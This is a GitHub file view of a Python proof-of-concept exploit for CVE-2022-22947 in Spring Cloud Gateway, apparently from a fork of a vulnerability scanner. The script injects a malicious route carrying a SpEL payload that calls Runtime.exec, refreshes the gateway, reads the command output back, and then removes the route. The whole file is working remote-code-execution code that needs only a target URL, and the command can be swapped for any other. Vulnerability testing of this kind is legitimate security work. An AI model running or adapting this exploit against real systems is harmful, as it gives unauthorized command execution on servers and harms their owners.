forked from GhostTroops/scan4all
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2022-22947_POC.py
131 lines (121 loc) · 4.11 KB
/
CVE-2022-22947_POC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
import requests
import urllib3
import json
import re
import sys
urllib3.disable_warnings()
a='''
CVE-2022-22947_POC CVE-2022-22947_POC CVE-2022-22947_POC
CVE-2022-22947_POC CVE-2022-22947_POC CVE-2022-22947_POC
'''
uri_check='/actuator/gateway/routes/code'
uri_refresh='/actuator/gateway/refresh'
#添加恶意路由的headers
headers_add = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Content-Type': 'application/json'
}
#refresh的headers
headers_refresh = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded'
}
#参考y4er的文章
payload = {
"id": "code",
"filters": [
{
"name": "AddResponseHeader",
"args": {
"value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
"name": "cmd123"
}
}
],
"uri": "http://aaa.com",
"order": 0
}
#注入路由
def zhuru(url):
try:
zr = url+uri_check
req_zhuru = requests.post(url=zr,headers=headers_add,data = json.dumps(payload, ensure_ascii = False),json=json,verify=False,timeout=2)
code_zhuru = req_zhuru.status_code
if code_zhuru ==200 or code_zhuru ==201:
print('[+]注入路由成功,漏洞存在')
else:
print('[-]注入路由失败,漏洞不存在')
print(code_zhuru)
except requests.exceptions.RequestException:
print('[-]注入路由超时,漏洞检测超时')
except:
print('[-]注入路由异常')
#刷新路由
def refresh(url):
try:
rf=url+uri_refresh
req_refresh =requests.post(url=rf,headers=headers_refresh,verify=False,timeout=1)
code_refresh=req_refresh.status_code
if code_refresh==200:
print('[+]刷新路由成功')
else:
print('[-]刷新路由失败')
# print(code_refresh)
# print(code_refresh)
except requests.exceptions.RequestException:
print('[-]刷新路由超时')
except:
print('[-]刷新路由异常')
#回显
def huixian(url):
try:
req_huixian=requests.get(url=url+uri_check,headers=headers_add,verify=False,timeout=1)
req_huixian_text=req_huixian.text
req_huixian_code =req_huixian.status_code
if req_huixian_code==200:
req_huixian_text = req_huixian_text.replace("'", '')
req_huixian_text = req_huixian_text.replace(" ", '')
req_huixian_text = req_huixian_text.replace("\\n", '')
req_huixian_re = re.compile(r'AddResponseHeaderResult=(.*?)],')
req_huixian_re_1 = req_huixian_re.findall(req_huixian_text, re.S)
huixian =req_huixian_re_1[0]
print(f'[+]获取回显命令成功:{huixian}')
# print(req_huixian_text)
else:
# print(req_huixian_code)
print('[-]获取回显失败,请手动测试')
except requests.exceptions.RequestException:
print('[-]获取回显超时')
except:
print('[-]获取回显异常,请手动测试')
#删除命令注入
def del_rce_in(url):
all=url+uri_check
try:
req =requests.delete(url=all,verify=False,timeout=2)
code = req.status_code
if code ==200:
print('[+]删除注入路由成功')
else:
print('[-]删除注入路由失败')
except requests.exceptions.RequestException:
print('[-]删除注入路由超时')
except:
print('[-]删除注入路由异常')
#检测漏洞
def poc(url):
zhuru(url)
refresh(url)
huixian(url)
del_rce_in(url)
refresh(url)
if __name__ == '__main__' :
print(a)
url = sys.argv[1]
poc(url)